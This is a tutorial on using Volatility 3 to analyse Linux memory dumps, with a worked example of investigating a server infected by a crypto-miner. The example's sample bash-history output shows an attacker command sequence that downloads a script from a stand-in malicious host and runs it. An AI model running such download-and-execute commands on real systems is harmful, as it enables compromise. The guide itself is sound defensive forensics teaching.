Volatility 3 — Linux Memory Dump Analysis Guide

What is Volatility 3?

Volatility 3 is a complete rewrite of the legendary RAM dump analysis framework. If you’ve read our previous article about Volatility, you already know the concept of memory forensics. Volatility 3 serves the same purpose, but with a modern architecture, much simpler usage, and better performance.

The most important change: no more profiles. In Volatility 2, you had to manually select a profile matching the kernel version — which was frustrating and error-prone. Volatility 3 automatically reads data structures directly from the kernel’s Symbol Tables, eliminating this problem entirely.

What Changed Compared to Volatility 2?

Feature	Volatility 2	Volatility 3
Language	Python 2/3	Python 3 (exclusively)
Profiles	Required, manual	Automatic (Symbol Tables)
Command	`volatility`	`vol` (or `vol3`)
Plugin syntax	`--profile=X pslist`	`linux.pslist` (hierarchical)
Performance	Slower	Significantly faster
Architecture	Monolithic	Modular, easy to extend

Installation

Volatility 3 requires Python 3.7 or newer.

# Clone the repository
git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3

# Install dependencies
pip3 install -r requirements.txt

# Verify it works
python3 vol.py -h

Installing Symbol Tables

Volatility 3 needs Symbol Tables matching the kernel version from the analyzed dump. For Linux, you can generate them yourself using the dwarf2json tool, or download pre-built ones from the project’s website.

# Download pre-built symbol tables for Linux
# Place them in the volatility3/symbols/ directory
ls volatility3/symbols/linux/

If Volatility 3 can’t find the appropriate table automatically, it will display an error message specifying the exact kernel version it’s looking for.

New Syntax — Key Plugins

In Volatility 3, plugins are organized hierarchically by operating system. For Linux, they all start with linux.:

Listing Processes

# Volatility 2 (old syntax):
# volatility -f dump.raw --profile=Linux_X pslist

# Volatility 3:
vol -f dump.raw linux.pslist

Process Tree

vol -f dump.raw linux.pstree

Network Connections

vol -f dump.raw linux.sockstat

Loaded Kernel Modules

vol -f dump.raw linux.lsmod

Open Files

vol -f dump.raw linux.lsof

Bash Command History

vol -f dump.raw linux.bash

Mounted Filesystems

vol -f dump.raw linux.mountinfo

Process Environment Variables

vol -f dump.raw linux.envars

Practical Example: Analyzing a Compromised Server

Scenario: Your server is behaving suspiciously — CPU load is high with no visible cause. You managed to capture a memory dump using LiME:

# Capturing memory on a live system
sudo insmod lime-$(uname -r).ko "path=/tmp/dump.raw format=raw"

Now let’s analyze the dump:

1. Listing processes:

vol -f /tmp/dump.raw linux.pslist

PID     PPID    COMM
1       0       systemd
...
4821    4820    kworkerds
4825    4821    kworkerds

We see a suspicious process kworkerds — a name deceptively similar to the legitimate kernel thread kworker, but it’s a separate process with its own PID and PPID.

2. Checking launch arguments:

vol -f /tmp/dump.raw linux.cmdline --pid 4821

PID     ARGS
4821    /tmp/kworkerds -o stratum+tcp://pool.minero.cc:5555 -u wallet123

It’s a cryptocurrency miner communicating with a mining pool.

3. Checking network connections:

vol -f /tmp/dump.raw linux.sockstat

The kworkerds process is maintaining an active TCP connection on port 5555 to an external IP address.

4. Finding out how the attacker got in:

vol -f /tmp/dump.raw linux.bash

PID     COMM    COMMAND
1102    bash    wget http://malicious.site/payload.sh -O /tmp/payload.sh
1102    bash    chmod +x /tmp/payload.sh
1102    bash    /tmp/payload.sh

The bash history reveals that the attacker downloaded and executed a malicious script.

Useful Options

Filtering by PID: Most plugins accept --pid to narrow results to a specific process:
```
vol -f dump.raw linux.lsof --pid 4821
```
Dumping a binary from memory: To extract a suspicious binary for further analysis:
```
vol -f dump.raw linux.elfs --pid 4821 --dump
```
Listing available plugins:
```
vol -f dump.raw linux --help
```

Volatility 3 vs Live Tools

It’s worth remembering how memory dump analysis differs from tools running on a live system:

ps, top, ss — can be fooled by rootkits that hide processes.
Volatility 3 analyzes raw memory — a rootkit cannot hide from offline analysis.
A memory dump is a “frozen” state — nothing changes during analysis, unlike on a live system.

Summary

Volatility 3 is a huge step forward from the previous version. Automatic kernel structure recognition, a clean plugin hierarchy, and better performance make memory analysis more accessible than ever. If you were previously discouraged by the hassle of dealing with profiles in Volatility 2, now is the best time to try again.